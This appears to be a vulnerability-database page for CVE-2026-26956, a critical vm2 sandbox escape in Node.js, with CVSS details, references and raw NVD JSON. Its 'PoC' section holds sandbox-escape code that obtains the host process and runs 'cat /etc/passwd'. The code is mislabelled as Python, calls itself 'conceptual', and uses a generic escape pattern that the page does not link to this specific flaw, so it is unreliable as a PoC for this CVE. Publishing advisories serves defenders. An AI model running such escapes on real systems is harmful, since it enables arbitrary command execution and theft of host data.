CVE-2026-26956

Description

vm2 is an open source vm/sandbox for Node.js. In version 3.10.4, vm2 is vulnerable to full sandbox escape with arbitrary code execution. Attacker code inside VM.run() obtains host process object and runs host commands with zero host cooperation. This issue has been patched in version 3.10.5.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:vm2_project:vm2:*:*:*:*:*:node.js:*:* - VULNERABLE

vm2 <= 3.10.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

const {VM} = require('vm2');
const vm = new VM();

// Conceptual exploit for vm2 sandbox escape
// This payload demonstrates how an attacker might escape the sandbox
const maliciousCode = `
    // Attempting to break out of the sandbox context
    // by accessing the host process object via constructor references
    const hostProcess = this.constructor.constructor('return process')();
    
    // Execute arbitrary command on the host system
    hostProcess.mainModule.require('child_process').execSync('cat /etc/passwd').toString();
`;

try {
    const output = vm.run(maliciousCode);
    console.log('Exploit success. Output:', output);
} catch (e) {
    console.error('Exploit failed or patched:', e);
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-26956
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-26956
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-26956/
[4] VulDB https://vuldb.com/cve/CVE-2026-26956
[5] https://github.com/patriksimek/vm2/releases/tag/v3.10.5
[6] https://github.com/patriksimek/vm2/security/advisories/GHSA-ffh4-j6h5-pg66
[7] https://github.com/patriksimek/vm2/security/advisories/GHSA-ffh4-j6h5-pg66

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-26956", "sourceIdentifier": "[email protected]", "published": "2026-05-04T17:16:22.553", "lastModified": "2026-05-08T19:15:17.833", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "vm2 is an open source vm/sandbox for Node.js. In version 3.10.4, vm2 is vulnerable to full sandbox escape with arbitrary code execution. Attacker code inside VM.run() obtains host process object and runs host commands with zero host cooperation. This issue has been patched in version 3.10.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vm2_project:vm2:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "3.10.5", "matchCriteriaId": "E0187C39-B05F-4D67-9B5D-7CBAA800A126"}]}]}], "references": [{"url": "https://github.com/patriksimek/vm2/releases/tag/v3.10.5", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-ffh4-j6h5-pg66", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-ffh4-j6h5-pg66", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}